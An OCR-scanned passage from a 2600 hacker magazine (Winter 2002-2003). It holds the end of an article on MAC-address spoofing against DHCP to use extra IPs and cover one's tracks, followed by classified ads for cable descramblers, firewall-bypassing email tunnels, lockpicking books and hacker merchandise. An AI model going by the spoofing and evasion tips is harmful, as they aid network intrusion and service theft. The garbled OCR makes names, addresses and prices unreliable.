which IPs don't return a MAC address. These computers are no longer accessible meaning that their MAC can be used to authenticate against the DHCP server. Follow the steps out- lined above using your newfound MAC address and you are on your w ay. Final Thoughts While using multiple IPs is a good way to cover your tracks, it is in no way a magic ring that makes you invisible on the Internet, Think of it more as an added layer of confusion when trying to follow your tracks. Al the very least l hope that you learned about Cygwin and how it can add a whole new dimension lo your Win- dows world. 1 have written several scripts around these concepts. Feel free lo email me for copies. Happy haxOringl Winter 2002-2003 Page 55 Happenings IN L ER7.QNF. II. April IS 1 3. 200 3. AtlantaN hacker con is dtrting another eve ijpcntr! Come educate or gum knowledge in today's is sues, All needed info is on site: wwwinterrifiie.cinn or email; con- tactl* inurndXte.com (That's intenzDne, spell with u irem!) SAN i KAN CISCO OPEN BSD USERS GROUP now meeting once a month ill Go*t Mill PiswjJc first Mondays at 7 pm - for info see hltp^Av wW.sfobug jorg- For Sale IP-BLIND OUTGOING SMTP TUNNEL suitstole for installation hehmd any wch-proxy firewall per year. Will completely disas- sociate your outgoing emails, from your employers network. Send check loTipjar, Bov 43 1 fi3 , Kansas City, MO 64171. Include u gltod email utldte^ for yourself where we will send you ihe client half of the software. This is for privacy Mid sidestepping restrictive corpo- rate aunnintncnooris directives, NOT bulk mail I.O.S. vio- lations. Ydut check will not he deposited until you declare your satisfaction. HACKERSTICKERS.COM - Get your geekish nerd related hacker slickers for your laptops, cars, and gear. All different colors and new designs ww w.lutckcrstickers .com . THE SLICES 'S GUILD, a slowly growing group, is taking urdcm for our first Kvue of the Slirtr'x Guild fnaga?me Tor only $5 (U.5.). lind tHi! why we call ourtelVeft "sheers" and why our hacker maga- zine is complementary to 2600 and noi competitive. This will not be offered as a subscription yet Yon will have to check Marketplace for when the second issue becomes available. Send your request with a money order along with anything else you might want to he primed in a I acute lame to Ijrry liaaiii Wheeler K 1 7592, KWH S. Hwy 2037* Fan Stockton. TX 79735 USA. WORLD'S I IRST 4 'DIGITAL DRUG." Hackers, get ready to cx pcriencc the next level in wciware technology! VoodooMagickBov is a 100*3 legal and safe way to enter into a drug-like Crip. A- 1 you need iu dji ts place the clips on your ears and turn the knob on the VtxxlooM flg rckBox It s like nothing you've ever irietll l or details and ordering informatifia, visit www.voLrfhKHHugiekbojt.coin (money orders, and credit cards accepted). CABLE TV tIESC RAMBLERS. New, (2) Each JUS +■ 45.00 ship ping, money nnJcricash only. Works on analog or analog/digital ca- ble systems, Premium channels and possibly PPV depending on system. Complete with UOvuc power supply. Purchaser ramus Mile responsibility Jlu notifying cubic OpCfflRhl ol use or descrambler Requires a cable TV convener ( i .e . . Radio Shack I to be used with the unit Cathie connects to the convener, then the descrambler, then rite output goes to TV y;i tuned to channel 3. CD 9621 Olive, Bos 2HW2-TS, Olivetret Sur, Missouri 63132. Email: caWedescramblcr- guy C^yahoo.eorn. REAL WORLD HACKING: Interested in rooftops, steam tunnels, and the like') For a copy of InfiUratk>n, the /ine aboul going places you're not supposed |o go. send 42 to PD Bos 1 3. Station F„ 1 ortmto, ON M6H4EI, Canada. INTERESTED IN PIRATE AND LEGAL DO-1T-VOI RSELF RADIO? Hobby Broadcasting magazine is dedicated to DTY nt io and broadcasting of all types. 52 pages. ^sample, S I 3/4 issues to Nobby Broadcasting, POB 642. Mont Aho. E*A 117237 www.hobby- broadL'asling.cojti . W W W.PRQTECTAJNELCOM. Protect yourself!: Everyone has a. need to be and feel safe froci the. outside world, We carry a lull line of self defense, security. and surveillance products ai low pnccs Every thing from alarms to mini cameras to telescopic batons to ■’tun puns and more! Cheek us out, ail major credit cards accepted. We ship worldwide! FREEDOM DOWNTIME, die fcuntre-kngih im) documentary, is now available on video! See the adventure unfold as we Try to get to the bottom of the Kevin Munick story and prevent a major motion picture from spreading more lies Available on VHS in NTSC (U.S. I format, 121 minutes Send $20 to 2600, PO Box 752, Middle Island, NY 1 1 953 or order via ljui online stone at www.2600.com MACINTOSH HACKERS can get nil (he mac underground fifes on A profess i mildly published CD. 650 Megs of PURE u tactile*. Eil- eludcs die De feint 7 Macintosh security speech, the whole Freaks Macintosh Archives and Whacked Mac Archives, 125,00 USD will ship irrtern.uionallv. SecureMac. PMB ' 1(1, 61 70 ft Lake Mesid BIvtL, Las Vegas, NV S9J0H. USA. Hack from your Mac! HACKER T-S H J R I S F ROM Y Ol R FAVORITE G RGL 1 F’S, along with a plethora of our own designs. Jinx Hack wear is selling t stli iris, sweatshirts, and hats for groups such as Ddeori, Phniek Mug- azme. Cult of I he Dead Cow, Packet Storm, HNC. Coll usion. Password Crackets Inc , HNS, Hackers com, AataLr vista, and New Order. New site wiih Forums. Hacker News. Conference Updates. LA N Parly listings, a Photo Gallery, and a chance to Spestk Out Check it out! |i(lp//wwwJmxHackwe,ir.cniri LEARN LOCK PICKING li s EASY with our new hook We've just released a new edidrtn adding lots more interesting; material and illustrations. Leant what (hey don't want you to know. Any security sy file in can be beaten, many times right through the front door Re secure. Learri the secrets and weakness of today's locks. If you want to get where you are not supposed to he. this book could be your ;m- swer. Explore the empowering world olTock pickinE Send twenty bucks In Standard Publi nations, PO Box 2226HQ. Ch;nn]"JSiLj£.t'i, II. 6IS25 or visit us ui www'.f,landardpublk:at ions.com/di rcct/2600.himl for your 2600 reader price discount, COVE KTA CCESS.COM - Amazing EQUIPMENT and SERVICES providing you with the physical and records access ytwi need! OVER 150 I I : I. KCOM MANUALS ere now available online lor free viewing/downlouding at Hit Synergy Globed Network's fully re- designed website. Must being available in Adobe PDF format, they are crisp, dean, suitable for printing, and complete. Update your phreuk library now he fore it’s too laic. We don t know how long this website WiU be allowed m distribute these manuals, however they are yours (or the time being. Our website is free and open to the pub- lic, and requires no purchase of any kind, and is also free from pop^ up (or pop under) advertisements as well. PAYPHONE SERVICE MANUALS TOO" Visit us online at: hUp;//www.*ynergygloba3 net- works, com, CAP'N CRUNCH WHISTLES. Brand new. only a few left THE ORIGINAL WHISTLE in mini condition, never used, Join the elite few who own this trews ere! Once they are gome, than is it there are no more! Keychain hole for keyring- Identify yourself at meetings, etc. as a 2600 member by dangling your keychain ami saying noth- ing, Cover rare hole and get exactly 2600 h/, cover ihe caber hole and get another frequency. Use both holes u> call your dog dr dol- phin. Also, ideal for tele phone remote control .k vices. Price includes mailing. $69.65, Not only a collector item hut a VERY USEFUL device lo carry at all limes. Cash or money order only Mail to: WHISTLE, Pt>. Bon 1 1 562 -ST, Ch. Mi.rfsoun 63105. HATE MICROSOFT? Or do they just leave a loul aftertaste? Show your divans faction with a ’’Calvin peemg on Microsoft" slicker Sticker is approx. 1~*T and fits nicely in a car window or even on ilv: side of your favorite p nix box, l uich sticker is made of commer- cial grade vinyl Water and UV ray rdislimi To see a sample go to htipL//calvmh;uef,micruwft .hypermun.net. 57, IX) (CIS), Slfi-00 (US) for irlcrmtional Oder the Calvin sticker and the MS logo is yours free. That's right, THE MIC ROSOFT LOGO IS FREE tear that one. Bill L Send a!) ■ irders to CD Muync, PO Box 57 1 79L Murray. Utah H4157 USA. Cash or money orders only. No checks credii cards, or COD Allow 2-3 weeks for delivery via US PS. Help Wanted HIRING PROFESSIONAL INTERNET CONSULTANTS with job references only for the following: wetwite security, performance tuning, and inurkcting for online magaziite. Please send your bio and resume to: jbhartswciribWyahoo.com -you can work from home, but should live in tor around) NYC. ft- you will need to attend a meeting or two. NEED ASSISTANCE In rescue/recover ASCII kxt data which arc presently compressfld/eiterypted by some rype of commercial pro- gram. Most files are rather largo, from 30 MB to about 6tX)MB. L’s- Page 56 2600 Magazine me DOS based starch engine for retrieval. Please advise i ( there ex-